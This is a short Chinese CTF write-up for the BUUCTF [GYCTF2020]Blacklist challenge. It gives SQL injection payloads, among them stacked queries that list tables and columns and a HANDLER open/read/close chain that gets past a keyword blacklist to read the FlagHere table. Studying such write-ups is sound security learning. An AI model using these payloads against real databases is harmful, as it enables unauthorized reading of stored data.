sql注入題型，測試發現黑名單如下：

?

大小寫，雙寫，編碼均不可繞過。?

可用的還有，or and union?show?

輸入：1 or 1=1 無反應

輸入：1' or '1' ='1?如下：

字符型注入，由于show可用，所以我們想到堆疊注入：

1';show tables;

查看字段名，

1';show columns from FlagHere;

?

過濾機制過于強大，所以我們使用handler，

HANDLER...OPEN語句打開一個表，使其可以使用后續HANDLER … READ語句訪問，該表對象未被其他會話共享，并且在會話調用HANDLER … CLOSE或會話終止之前不會關閉。

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;# 打開FlagHere表,讀取第一個，然后關閉會話。

?

思路：黑名單過濾，show可用，想到使用堆疊注入，知道flag在FlagHere表中之后，使用 handler?讀取flag。

?

?

?

總結

以上是生活随笔為你收集整理的BUUCTF[GYCTF2020]Blacklist的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。